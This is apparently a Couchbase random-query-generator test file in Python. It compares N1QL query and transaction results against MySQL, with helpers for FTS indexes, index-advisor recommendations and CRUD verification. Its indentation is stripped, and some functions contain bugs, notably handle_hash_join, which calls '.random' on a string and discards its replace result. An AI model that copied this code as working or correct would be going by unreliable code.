self.advise_buckets = ["bucket_01", "bucket_02", "bucket_03", "bucket_04", "bucket_05", "bucket_06", "bucket_07", "bucket_08", "bucket_09", "bucket_10"]
self.advise_dict={}
if self.input_rqg_path is not None:
self.secondary_index_info_path = self.input_rqg_path+"/index/secondary_index_definitions.txt"
self.db_dump_path = self.input_rqg_path+"/db_dump/database_dump.zip"
self.test_file_path = self.input_rqg_path+"/input/source_input_rqg_run.txt"
if self.initial_loading_to_cb:
self._initialize_cluster_setup()
if self.subquery:
self.items = 500
if not self.use_rest:
self._ssh_client = paramiko.SSHClient()
self._ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.os = self.shell.extract_remote_info().type.lower()
except Exception as ex:
self.log.info("============== RQG Setup Has Failed ==============")
traceback.print_exc()
self.assertTrue(False)
self.tearDown()
self.log.info("============== RQG Setup Has Completed ==============")
def tearDown(self):
try:
self.log.info("============== RQG BasTestCase Teardown Has Started ==============")
super(BaseRQGTests, self).tearDown()
self.log.info("============== RQG BasTestCase Teardown Has Completed ==============")
self.log.info("============== RQG Teardown Has Started ==============")
if hasattr(self, 'reset_database'):
if self.teardown_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
self.kill_mysql_processes(client)
client.drop_database(self.database)
except Exception as ex:
self.log.info("============== RQG Teardown Has Failed ==============")
self.log.info(ex)
self.log.info("============== RQG Teardown Has Completed ==============")
def kill_mysql_processes(self, client):
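# Build "KILL <id>;" statements from information_schema.processlist for any
# long-running root connections, execute them, and drop the test database.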
columns, rows = client._execute_query(query="select concat('KILL ',id,';') from information_schema.processlist where user='root' and time > 0;")
sql_result = client._gen_json_from_results(columns, rows)
for result in sql_result:
for key in list(result.keys()):
query = result[key]
# execute kill query
client._db_execute_query(query=query)
client.drop_database(self.database)
def create_fts_index(self, name, source_type='couchbase',
source_name=None, index_type='fulltext-index',
index_params=None, plan_params=None,
source_params=None, source_uuid=None, doc_count=1000):
"""Create fts index/alias
@param name: name of the index/alias
@param source_type : 'couchbase' or 'files'
@param source_name : name of couchbase bucket or "" for alias
@param index_type : 'fulltext-index' or 'fulltext-alias'
@param index_params : to specify advanced index mapping;
dictionary overriding params in
INDEX_DEFAULTS.BLEVE_MAPPING or
INDEX_DEFAULTS.ALIAS_DEFINITION depending on
index_type
@param plan_params : dictionary overriding params defined in
INDEX_DEFAULTS.PLAN_PARAMS
@param source_params: dictionary overriding params defined in
INDEX_DEFAULTS.SOURCE_CB_PARAMS or
INDEX_DEFAULTS.SOURCE_FILE_PARAMS
@param source_uuid: UUID of the source, may not be used
"""
self.cbcluster = CouchbaseCluster(name='cluster', nodes=self.servers, log=self.log)
index_params = {"default_analyzer": "keyword",
"default_mapping": {
"enabled": True,
"dynamic": True,
}
}
plan_params = {'numReplicas': 0}
fts_index = FTSIndex(
self.cbcluster,
name,
source_type,
source_name,
index_type,
index_params,
plan_params,
source_params,
source_uuid)
fts_index.create()
indexed_doc_count = 0
retry_count = 10
# poll until the FTS index catches up, giving up after retry_count attempts
while indexed_doc_count < doc_count and retry_count > 0:
retry_count -= 1
try:
self.sleep(10)
indexed_doc_count = fts_index.get_indexed_doc_count()
except KeyError:
# index stats may not be available yet; retry on the next pass
continue
if indexed_doc_count != doc_count:
self.fail(
"FTS indexing did not complete. FTS index count : {0}, Bucket count : {1}".format(indexed_doc_count,
doc_count))
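# Illustrative use (mirroring test_rqg below): one index per generated table,
# waiting for the indexed document count to reach doc_count, e.g.
#   self.create_fts_index(name="default_index1", source_name=self.database + "_" + table_name)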
def test_rqg(self):
try:
# Get Data Map
run_seed = random.seed(uuid.uuid4())
self.log.info("SEED: {0}".format(run_seed))
table_list = self.client._get_table_list()
table_map = self.client._get_values_with_type_for_fields_in_table()
if self.use_txns:
failures = {}
passes = 0
fails = 0
update_query_template_list = []
delete_query_template_list = []
select_query_template_list = []
i = 1
for table_name in table_list:
if self.use_fts:
fts_index = self.create_fts_index(name="default_index" + str(i), source_name=self.database+"_"+table_name)
i = i + 1
if self.use_txns:
results = self.n1ql_helper.run_cbq_query(query="CREATE PRIMARY INDEX ON {0}".format(self.database + "_" + table_name))
if self.remove_alias:
table_map = self.remove_aliases_from_table_map(table_map)
if self.use_analytics:
data = 'use Default;'
bucket_username = "cbadminbucket"
bucket_password = "password"
for bucket in self.buckets:
data = 'create dataset {1} on {0}; '.format(bucket.name,
bucket.name + "_shadow")
filename = "file.txt"
f = open(filename, 'w')
f.write(data)
f.close()
url = 'http://{0}:8095/analytics/service'.format(self.master.ip)
cmd = 'curl -s --data pretty=true --data-urlencode "statement@file.txt" ' + url + " -u " + bucket_username + ":" + bucket_password
os.system(cmd)
os.remove(filename)
data = 'connect link Local;'
filename = "file.txt"
f = open(filename, 'w')
f.write(data)
f.close()
url = 'http://{0}:8095/analytics/service'.format(self.master.ip)
cmd = 'curl -s --data pretty=true --data-urlencode "statement@file.txt" ' + url + " -u " + bucket_username + ":" + bucket_password
os.system(cmd)
os.remove(filename)
if self.crud_ops:
table_list.remove("copy_simple_table")
query_template_list = self.extract_query_templates()
if self.use_txns:
for query in query_template_list:
if "fields_asc_desc" in query[0]:
select_query_template_list.append(query[1])
elif "update" in query[0]:
update_query_template_list.append(query[1])
elif "delete" in query[0]:
delete_query_template_list.append(query[1])
random.shuffle(select_query_template_list)
random.shuffle(update_query_template_list)
random.shuffle(delete_query_template_list)
# Generate the query batches based on the given template file and the concurrency count
else:
if self.randomize:
random.shuffle(query_template_list)
batches = self.generate_batches(table_list, query_template_list)
result_queue = queue.Queue()
failure_queue = queue.Queue()
input_queue = queue.Queue()
# Run Test Batches
thread_list = []
start_test_case_number = 1
if self.crud_ops:
for table_name in table_list:
if len(batches[table_name]) > 0:
self._crud_ops_worker(batches[table_name], table_name, table_map, result_queue, failure_queue)
elif self.use_txns:
for x in range(0, self.num_txns):
rollback_exists = False
savepoints = []
txn_queries = []
savepoint = 0
test_batch = []
rollback_point = 0
select_batches = self.generate_batches(table_list, select_query_template_list)
update_batches = self.generate_batches(table_list, update_query_template_list)
delete_batches = self.generate_batches(table_list, delete_query_template_list)
i = 0
self.log.info("-----------------------------------------------------------------STARTING TRANSACTION txn {0}-----------------------------------------------------------------".format(x))
results = self.n1ql_helper.run_cbq_query(query="START TRANSACTION", txtimeout="4m")
txn_id = results['results'][0]['txid']
self.log.info("TXN ID {0}".format(txn_id))
txn_queries.append("START TRANSACTION")
while not (select_batches.empty() and update_batches.empty() and delete_batches.empty()):
# Split up the batches and send them to the worker threads
try:
select_batch = select_batches.get(False)
update_batch = update_batches.get(False)
delete_batch = delete_batches.get(False)
except Exception as ex:
self.log.error(str(ex))
break
random.seed(uuid.uuid4())
percentage = random.randint(1, 100)
if percentage <= 50:
query_type = random.choice(['select','select','select','select','select','select','update','update','update', 'update'])
if query_type == 'select':
test_batch = select_batch
elif query_type == 'update':
test_batch = update_batch
self.crud_type = "update"
elif query_type == 'delete':
test_batch = delete_batch
self.crud_type = "delete"
test_query_template_list = [test_data[list(test_data.keys())[0]] for test_data in test_batch]
table_name_description_map = {'simple_table': table_map['simple_table']}
# create strings for queries and indexes but doesn't send indexes to Couchbase
if query_type == 'update' or query_type == 'delete':
sql_n1ql_index_map_list = self.convert_crud_ops_query(table_name, test_query_template_list, table_name_description_map)
else:
sql_n1ql_index_map_list = self.client._convert_template_query_info(table_map=table_name_description_map,
n1ql_queries=test_query_template_list,
define_gsi_index=self.use_secondary_index,
aggregate_pushdown=self.aggregate_pushdown,
partitioned_indexes=self.partitioned_indexes,
ansi_joins=self.ansi_joins,
with_let=self.with_let)
for sql_n1ql_index_map in sql_n1ql_index_map_list:
if not query_type == 'select':
sql_n1ql_index_map["n1ql_query"] = sql_n1ql_index_map['n1ql_query'].replace("simple_table",
self.database + "_" + "simple_table")
if query_type == 'delete':
sql_n1ql_index_map['n1ql_query'] = sql_n1ql_index_map['n1ql_query'].split(";")[0] + " LIMIT 10;" + sql_n1ql_index_map['n1ql_query'].split(";")[1]
sql_n1ql_index_map['sql_query'] = sql_n1ql_index_map['sql_query'].split(";")[0] + " LIMIT 10;" + sql_n1ql_index_map['sql_query'].split(";")[1]
else:
sql_n1ql_index_map["n1ql"] = sql_n1ql_index_map['n1ql'].replace("simple_table", self.database+"_"+"simple_table")
# build indexes
if self.use_secondary_index:
self._generate_secondary_indexes_in_batches(sql_n1ql_index_map_list)
for test_case_input in sql_n1ql_index_map_list:
# if self.use_advisor:
# self.create_secondary_index(n1ql_query=test_case_input['n1ql'])
if not query_type == 'select':
self.n1ql_helper.run_cbq_query(query=test_case_input['n1ql_query'], txnid=txn_id)
txn_queries.append(test_case_input['sql_query'])
else:
self.n1ql_helper.run_cbq_query(query=test_case_input['n1ql'], txnid=txn_id)
txn_queries.append(test_case_input['sql'])
percentage2 = random.randint(1, 100)
if percentage2 <= 10:
savepoint = i
self.log.info("CREATING SAVEPOINT s{0}".format(savepoint))
results = self.n1ql_helper.run_cbq_query(query="SAVEPOINT s{0}".format(savepoint), txnid=txn_id)
txn_queries.append("SAVEPOINT s{0}".format(savepoint))
savepoints.append("s{0}".format(savepoint))
i = i + 1
if savepoints:
percentage3 = random.randint(1, 100)
if percentage3 <= 10:
rollback_point = random.randint(0, savepoint)
for txns in txn_queries:
if "ROLLBACK" in txns:
rollback_exists = True
break
if not rollback_exists:
self.log.info("ROLLING BACK")
results = self.n1ql_helper.run_cbq_query(query=f"ROLLBACK TO SAVEPOINT s{savepoint}", txnid=txn_id)
txn_queries.append(f"ROLLBACK TO SAVEPOINT s{savepoint}")
self.log.info("-----------------------------------------------------------------COMMITING TRANSACTION {0}-----------------------------------------------------------------".format(x))
results = self.n1ql_helper.run_cbq_query(query="COMMIT TRANSACTION", txnid=txn_id)
txn_queries.append("COMMIT")
self.log.info("txn {0} : {1}".format(x, txn_queries))
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id,
password=self.password)
cursor = client.mysql_connector_client.cursor(buffered=True)
for sql_query in txn_queries:
cursor.execute(sql_query)
client.mysql_connector_client.commit()
n1ql_result = self.n1ql_helper.run_cbq_query('select bool_field1,char_field1,datetime_field1,decimal_field1,int_field1,primary_key_id,varchar_field1 FROM {0}'.format(self.database+"_"+"simple_table"))
columns, rows = client._execute_query(query='SELECT * FROM simple_table')
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
diffs = DeepDiff(sql_result, n1ql_result['results'], ignore_order=True,
ignore_numeric_type_changes=True)
if diffs:
txn_no = 'txn {0}'.format(x)
failures[txn_no] = (diffs, txn_queries)
fails += 1
else:
passes += 1
else:
while not batches.empty():
# Split up the batches and send them to the worker threads
try:
test_batch = batches.get(False)
except Exception as ex:
break
test_query_template_list = [test_data[list(test_data.keys())[0]] for test_data in test_batch]
input_queue.put({"start_test_case_number": start_test_case_number,
"query_template_list": test_query_template_list})
start_test_case_number += len(test_query_template_list)
for table_name in table_list:
# Create threads based on number of tables (each table has its own thread)
self._rqg_worker(table_name, table_map, input_queue, result_queue,
failure_queue)
if not self.use_txns:
# Analyze the results for the failure and assert on the run
self.analyze_test(result_queue, failure_queue)
else:
self.log.info("Txns Passed: {0} Txn Failed: {1}".format(passes, fails))
if not fails == 0:
self.log.error("Failures were seen, the number of documents in the bucket is not the same in mysql and n1ql after transactions!")
for failure in failures:
self.log.info("----------------------------------------------------------------{0}-----------------------------------------------------------------------------".format(failure))
self.log.info("diffs: {0} txn: {1}".format(failures[failure][0], failure))
self.fail()
except Exception as ex:
traceback.print_exc()
self.log.info(ex)
self.assertFalse(True)
def _rqg_worker(self, table_name, table_map, input_queue, result_queue, failure_record_queue=None):
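# Worker for a single table: pull template batches from input_queue, convert
# them to paired SQL/N1QL queries (optionally with GSI index definitions),
# run each test case in its own thread, then drop the batch's indexes.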
count = 0
table_name_description_map = {table_name: table_map[table_name]}
while True:
if self.total_queries <= self.query_count:
break
if not input_queue.empty():
data = input_queue.get()
start_test_case_number = data["start_test_case_number"]
query_template_list = data["query_template_list"]
# create strings for queries and indexes but doesn't send indexes to Couchbase
sql_n1ql_index_map_list = self.client._convert_template_query_info(table_map=table_name_description_map,
n1ql_queries=query_template_list,
define_gsi_index=self.use_secondary_index,
aggregate_pushdown=self.aggregate_pushdown,
partitioned_indexes=self.partitioned_indexes,
ansi_joins=self.ansi_joins,
with_let=self.with_let)
for sql_n1ql_index_map in sql_n1ql_index_map_list:
sql_n1ql_index_map["n1ql"] = sql_n1ql_index_map['n1ql'].replace("simple_table", self.database+"_"+"simple_table")
# build indexes
if self.use_secondary_index:
self._generate_secondary_indexes_in_batches(sql_n1ql_index_map_list)
thread_list = []
test_case_number = start_test_case_number
for test_case_input in sql_n1ql_index_map_list:
t = threading.Thread(target=self._run_basic_test, args=(test_case_input, test_case_number, result_queue, failure_record_queue))
#self._run_basic_test(test_case_input, test_case_number, result_queue, failure_record_queue)
test_case_number += 1
t.daemon = True
t.start()
thread_list.append(t)
# Drop all the secondary Indexes
for t in thread_list:
t.join()
if self.use_secondary_index and self.drop_secondary_indexes:
self._drop_secondary_indexes_in_batches(sql_n1ql_index_map_list)
else:
count += 1
if count > 1000:
return
def n1ql_query_runner_wrapper(self, n1ql_query="", server=None, query_params={}, scan_consistency=None, verbose=True, query_context=None):
if self.use_advisor:
queries = n1ql_query.split(' UNION ')
for q in queries:
query = re.sub(r"^\((.*?)\)$", r"\1", q.strip())
self.create_secondary_index(n1ql_query=query)
if self.use_query_context:
result = self.n1ql_helper.run_cbq_query(query=n1ql_query, server=server, query_params=query_params,
scan_consistency=scan_consistency, verbose=verbose,query_context=query_context,use_sdk=self.use_sdk)
else:
result = self.n1ql_helper.run_cbq_query(query=n1ql_query, server=server, query_params=query_params, scan_consistency=scan_consistency, verbose=verbose,use_sdk=self.use_sdk)
return result
def prepare_advise_query(self, n1ql_query=""):
for bucket in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(bucket, self.advise_dict[bucket])
n1ql_query = n1ql_query.replace("._default._default", '')
if self.use_query_context:
n1ql_query = n1ql_query.replace("_default", self.advise_dict[bucket])
n1ql_query = n1ql_query.replace("PREPARE", "")
return n1ql_query
def translate_index_statement(self, n1ql_query=""):
index_name = ""
index_bucket = ""
for key in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(self.advise_dict[key], key)
        # remote util shell strips all spaces out of returns, need to re-add them
if not self.use_rest:
n1ql_query = n1ql_query.replace("CREATE", "CREATE ")
n1ql_query = n1ql_query.replace("INDEX", "INDEX ")
n1ql_query = n1ql_query.replace("ON", " ON ")
n1ql_query = n1ql_query.replace("(", " ( ")
n1ql_query = n1ql_query.replace(")", " ) ")
n1ql_query = n1ql_query.replace("`", "\`")
index_parts = n1ql_query.split("ON")
for statement in index_parts:
if "adv" in statement:
index_name = statement.replace("CREATE INDEX ", "").strip()
elif "`" in statement:
if not self.use_rest:
index_bucket = statement.split("(")[0].replace("\`", "").strip()
else:
index_bucket = statement.split("(")[0].replace("`", "").strip()
return n1ql_query,index_name,index_bucket
def create_secondary_index(self, n1ql_query=""):
use_partitioned = False
if "EXECUTE" not in n1ql_query:
if self.count_secondary_indexes() >= self.index_limit:
self.remove_all_secondary_indexes()
self.n1ql_helper.wait_for_all_indexes_online()
advise_query = self.prepare_advise_query(n1ql_query=n1ql_query)
advise_result = self.n1ql_helper.run_cbq_query(query="ADVISE " + advise_query,
server=self.n1ql_server)
if len(advise_result["results"][0]["advice"]["adviseinfo"]) == 0:
self.log.info("No advise for index")
return
if "index recommendation at this time" not in str(advise_result["results"][0]["advice"]["adviseinfo"]["recommended_indexes"]):
if "indexes" in advise_result["results"][0]["advice"]["adviseinfo"][
"recommended_indexes"].keys():
for index_statement_array in advise_result["results"][0]["advice"]["adviseinfo"]["recommended_indexes"]["indexes"]:
index_statement = index_statement_array["index_statement"]
if index_statement != "":
try:
prepared_index_statement, index_name, index_bucket = self.translate_index_statement(index_statement)
# insert randomization logic for partitioned vs non_partitioned indexes
chance_of_partitioned = random.randint(1, 100)
if chance_of_partitioned <= 30:
use_partitioned = True
self.log.info("Using partitioned index for this query: {0}".format(n1ql_query))
if self.use_txns:
if use_partitioned:
prepared_index_statement = prepared_index_statement + " PARTITION BY HASH(META().id)"
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper._wait_for_index_online(index_bucket,index_name)
else:
if use_partitioned:
prepared_index_statement = prepared_index_statement + " PARTITION BY HASH(META().id)"
self.log.info(prepared_index_statement)
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper._wait_for_index_online(index_bucket,index_name)
except CBQError as ex:
if "already exists" in str(ex) or "alreadyexists" in str(ex):
continue
if "covering_indexes" in advise_result["results"][0]["advice"]["adviseinfo"][
"recommended_indexes"].keys():
for index_statement_array in advise_result["results"][0]["advice"]["adviseinfo"]["recommended_indexes"]["covering_indexes"]:
index_statement = index_statement_array["index_statement"]
if index_statement != "":
try:
prepared_index_statement, index_name, index_bucket = self.translate_index_statement(index_statement)
chance_of_partitioned = random.randint(1, 100)
if chance_of_partitioned <= 30:
use_partitioned = True
self.log.info("Using partitioned index for this query: {0}".format(n1ql_query))
if self.use_txns:
if use_partitioned:
prepared_index_statement = prepared_index_statement + " PARTITION BY HASH(META().id)"
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper._wait_for_index_online(index_bucket,index_name)
else:
if use_partitioned:
prepared_index_statement = prepared_index_statement + " PARTITION BY HASH(META().id)"
self.log.info(prepared_index_statement)
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper._wait_for_index_online(index_bucket,index_name)
except CBQError as ex:
if "already exists" in str(ex) or "alreadyexists" in str(ex):
continue
def count_secondary_indexes(self):
count = self.n1ql_helper.run_cbq_query("select count(*) from system:indexes")
return int(count["results"][0]["$1"])
def remove_all_secondary_indexes(self):
self.n1ql_helper.drop_all_indexes()
def _run_basic_test(self, query_test_map, test_case_number, result_queue, failure_record_queue=None):
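        # Runs one generated test case end to end: normalizes the SQL/N1QL pair
        # (limit/offset, table names, subquery and hash-join handling), then records
        # the outcome of each enabled check (plain run, LIMIT variant, primary and
        # secondary index hints, EXPLAIN checks, aggregate pushdown) in result_run
        # before pushing it onto result_queue.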
n1ql_query = query_test_map["n1ql"]
sql_query = query_test_map["sql"]
indexes = query_test_map["indexes"]
expected_result = query_test_map["expected_result"]
sql_query, n1ql_query = self.handle_limit_offset(sql_query, n1ql_query)
n1ql_query = self.handle_n1ql_table_name(n1ql_query)
sql_query, n1ql_query, aggregate = self.handle_subquery(sql_query, n1ql_query)
n1ql_query = self.handle_hash_join(n1ql_query)
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(
test_case_number))
# results dict
result_run = dict()
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
        # create a randomized set of params to pass to _run_queries_and_verify:
        # decide prepared or not, partitioned or not, and execution type;
        # store these params in a dictionary (possibly extend result_run to contain these choices)
if self.ansi_transform:
result = self._run_explain_queries(n1ql_query=n1ql_query, keyword="u'outer':u'True'", present=False)
result_run.update(result)
if self.check_explain_plan:
            result_run['check_explain_plan'] = self._check_explain_plan_for_secondary_index(n1ql_query=n1ql_query)
# run the query
result_run["run_query_without_index_hint"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query,
sql_query=sql_query,
expected_result=expected_result)
if expected_result is None:
expected_result = self._gen_expected_result(sql_query, test_case_number)
query_test_map["expected_result"] = expected_result
if self.set_limit > 0 and n1ql_query.find("DISTINCT") > 0:
result_limit = self.query_helper._add_limit_to_query(n1ql_query, self.set_limit)
result_run["run_query_with_limit"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=result_limit,
sql_query=sql_query,
expected_result=expected_result)
if self.run_query_with_primary:
index_info = [{"name": "`#primary`", "type": "GSI"}]
n1ql_query_with_hints = self.query_helper._add_index_hints_to_query(n1ql_query, index_info)
result_run["run_query_with_primary"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query_with_hints,
sql_query=sql_query,
expected_result=expected_result)
if self.aggregate_pushdown == "primary" and not self.with_let:
result_run["aggregate_explain_check::#primary"] = self._run_query_with_pushdown_check(n1ql_query,
index_info)
if self.run_query_with_secondary:
for index_name in list(indexes.keys()):
n1ql_query_with_hints = self.query_helper._add_index_hints_to_query(n1ql_query, [indexes[index_name]])
result_run["run_query_with_index_name::{0}" + str(index_name)] = self._run_queries_and_verify(
aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query_with_hints,
sql_query=sql_query,
expected_result=expected_result)
if self.run_explain_with_hints:
result = self._run_queries_with_explain(n1ql_query, indexes)
result_run.update(result)
if self.aggregate_pushdown and not self.with_let:
for index_name in list(indexes.keys()):
result_run["aggregate_explain_check::" + str(index_name)] = self._run_query_with_pushdown_check(
n1ql_query,
indexes[index_name])
if self.ansi_joins and self.hash_joins:
self._verify_query_with_hash_joins(n1ql_query)
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, query_test_map, failure_record_queue)
self.query_count += 1
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
def _crud_ops_worker(self, list_info, table_name, table_map, result_queue=None, failure_record_queue=None):
table_name_map = {table_name: table_map[table_name]}
for test_data in list_info:
test_case_number = list(test_data.keys())[0]
test_data = test_data[test_case_number]
data_info = self.convert_crud_ops_query(table_name, [test_data], table_name_map)
verification_query = "SELECT * from {0} where primary_key_id is not null ORDER by primary_key_id".format(table_name)
self._run_basic_crud_test(data_info[0], verification_query, test_case_number, result_queue, failure_record_queue, table_name=table_name)
self._populate_delta_buckets(table_name)
self.wait_for_num_items(table_name, 1000)
def remove_aliases_from_table_map(self, table_map):
for key in list(table_map.keys()):
if "alias_name" in list(table_map[key].keys()):
table_map[key].pop("alias_name")
return table_map
def extract_query_templates(self):
file_paths = self.test_file_path.split(":")
query_template_list = []
for file_path in file_paths:
file_path = self.unzip_template(file_path)
cur_queries_list = []
with open(file_path) as f:
cur_queries_list = f.readlines()
for q in cur_queries_list:
if self.use_txns:
query_template_list.append((file_path,q))
else:
query_template_list.append(q)
if self.total_queries is None:
self.total_queries = len(query_template_list)
return query_template_list
def generate_batches(self, table_list, query_template_list):
if self.crud_ops:
batches = {}
for table_name in table_list:
batches[table_name] = []
else:
batches = queue.Queue()
batch = []
count = 1
inserted_count = 0
test_case_number = 1
for template_query in query_template_list:
if self.crud_ops:
batches[table_list[test_case_number % (len(table_list))]].append({str(test_case_number): template_query})
else:
batch.append({str(test_case_number): template_query})
if count == self.concurreny_count:
inserted_count += len(batch)
batches.put(batch)
count = 1
batch = []
else:
count += 1
test_case_number += 1
if test_case_number > self.total_queries:
break
if not self.crud_ops:
if len(batch) > 0:
batches.put(batch)
return batches
def analyze_test(self, result_queue, failure_queue):
success, summary, result = self._test_result_analysis(result_queue)
self.log.info(result)
self.dump_failure_data(failure_queue)
self.assertTrue(success, summary)
def convert_crud_ops_query(self, table_name, data_info, table_name_map):
if self.crud_type == "update":
data_info = self.client_map[table_name]._convert_update_template_query_info(
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "delete":
data_info = self.client_map[table_name]._convert_delete_template_query_info(
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "merge_update":
data_info = self.client_map[table_name]._convert_update_template_query_info_with_merge(
source_table=self.database+"_"+"copy_simple_table",
target_table=table_name,
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "merge_delete":
data_info = self.client_map[table_name]._convert_delete_template_query_info_with_merge(
source_table=self.database+"_"+"copy_simple_table",
target_table=table_name,
table_map=table_name_map,
n1ql_queries=data_info)
return data_info
def wait_for_num_items(self, table, num_items):
num_items_reached = False
while not num_items_reached:
self.sleep(1)
query = "SELECT COUNT(*) from {0}".format(self.database+"_"+table)
result = self.n1ql_query_runner_wrapper(n1ql_query=query, server=self.n1ql_server)
if result["results"][0]["$1"] == num_items:
num_items_reached = True
def handle_limit_offset(self, sql_query, n1ql_query):
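        # Substitutes the NUMERIC_VALUE1/NUMERIC_VALUE2 placeholders with a random
        # LIMIT (1..30) and an OFFSET derived from it, in both the SQL and N1QL
        # templates. Illustrative example (values vary per run):
        #   "... LIMIT NUMERIC_VALUE1 OFFSET NUMERIC_VALUE2"
        #   ->  "... LIMIT 12 OFFSET 2"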
if "NUMERIC_VALUE1" in n1ql_query:
limit = random.randint(1, 30)
n1ql_query = n1ql_query.replace("NUMERIC_VALUE1", str(limit))
sql_query = sql_query.replace("NUMERIC_VALUE1", str(limit))
if limit < 10:
offset = limit - 2
else:
offset = limit - 10
if offset < 0:
offset = 0
n1ql_query = n1ql_query.replace("NUMERIC_VALUE2", str(offset))
sql_query = sql_query.replace("NUMERIC_VALUE2", str(offset))
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
return sql_query, n1ql_query
def handle_n1ql_table_name(self, n1ql_query):
if (n1ql_query.find("simple_table") > 0) and ((self.database+"_"+"simple_table") not in n1ql_query):
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
return n1ql_query
def handle_subquery(self, sql_query, n1ql_query):
aggregate = False
if self.subquery:
n1ql_query = n1ql_query.replace(self.database+"_"+"simple_table_2", "t_5.simple_table_2")
n1ql_query = n1ql_query.replace("t_5.t_5.simple_table_2", "t_5.simple_table_2")
if "qty" in n1ql_query:
n1ql_query = n1ql_query.replace("t_2.qty", "qty")
n1ql_query = n1ql_query.replace("qty", "t_2.qty")
if "sum" in n1ql_query:
n1ql_query = n1ql_query.replace("sum(t_1.productId)", "sum(t_1.qty)")
sql_query = sql_query.replace("sum(t_1.productId)", "sum(t_1.qty)")
n1ql_query = n1ql_query.replace("t_5.simple_table_2 t_1.price", "t_1.price")
sql_query = sql_query.replace("simple_table_2 t_1.price", "t_1.price")
n1ql_query = n1ql_query + " order by primary_key_id limit 5"
sql_query = sql_query + " order by t_5.primary_key_id limit 5"
if "sum" in n1ql_query or "min" in n1ql_query or "max" in n1ql_query or "count" in n1ql_query:
aggregate = True
return sql_query, n1ql_query, aggregate
def handle_hash_join(self, n1ql_query):
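        # When ANSI hash joins are enabled, splices a randomly chosen HASH(build) or
        # HASH(probe) hint in front of each ON clause, e.g. (illustrative):
        #   "... JOIN t2 ON t1.id = t2.id"  ->  "... JOIN t2 HASH(build) ON t1.id = t2.id"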
if self.ansi_joins and self.hash_joins:
hash_join_template_list = ["HASH(build)", "HASH(probe)"]
n1ql_query.replace(" ON ", "{0} ON ".random.choice(hash_join_template_list))
return n1ql_query
def _run_query_with_pushdown_check(self, n1ql_query, index):
message = "Pass"
explain_check = False
if isinstance(index, dict):
index = [index]
query = self.query_helper._add_index_hints_to_query(n1ql_query, index)
explain_n1ql = "EXPLAIN " + query
try:
actual_result = self.n1ql_helper.run_cbq_query(query=explain_n1ql, server=self.n1ql_server)
if "index_group_aggs" in str(actual_result):
explain_check = True
if not explain_check:
message = "aggregate query {0} with index {1} failed explain result, index_group_aggs not found".format(n1ql_query, index)
self.log.info(message)
self.log.info(str(actual_result))
except Exception as ex:
self.log.info(ex)
message = ex
explain_check = False
finally:
return {"success": explain_check, "result": message}
def _verify_query_with_hash_joins(self, n1ql_query):
message = "Pass"
explain_check = True
explain_n1ql = "EXPLAIN " + n1ql_query
hash_query_count = n1ql_query.count("HASH")
try:
actual_result = self.n1ql_helper.run_cbq_query(query=explain_n1ql, server=self.n1ql_server)
hash_explain_count = str(actual_result).count("HashJoin")
explain_check = (hash_query_count == hash_explain_count)
if not explain_check:
message = "Join query {0} with failed explain result, HashJoins not found".format(n1ql_query)
self.log.info(message)
self.log.info(str(actual_result))
except Exception as ex:
self.log.info(ex)
message = ex
explain_check = False
finally:
return {"success": explain_check, "result": message}
def _run_basic_crud_test(self, test_data, verification_query, test_case_number, result_queue, failure_record_queue=None, table_name=None):
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
result_run = {}
n1ql_query = test_data["n1ql_query"]
if n1ql_query.find("copy_simple_table") > 0:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
n1ql_query = n1ql_query.replace("copy_"+self.database+"_"+"simple_table", "copy_simple_table")
n1ql_query = n1ql_query.replace("ON KEY copy_simple_table", "ON KEY " + self.database+"_"+"copy_simple_table")
else:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
test_data["n1ql_query"] = n1ql_query
sql_query = test_data["sql_query"]
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
self.log.info("SQL :: {0}".format(sql_query))
self.log.info("N1QL :: {0}".format(n1ql_query))
crud_ops_run_result = None
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
try:
self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server)
client._insert_execute_query(query=sql_query)
except Exception as ex:
self.log.info(ex)
crud_ops_run_result = {"success": False, "result": str(ex)}
        client._close_connection()
if crud_ops_run_result is None:
query_index_run = self._run_queries_and_verify_crud(n1ql_query=verification_query, sql_query=verification_query, expected_result=None, table_name=table_name)
else:
query_index_run = crud_ops_run_result
result_run["crud_verification_test"] = query_index_run
result_queue.put(result_run)
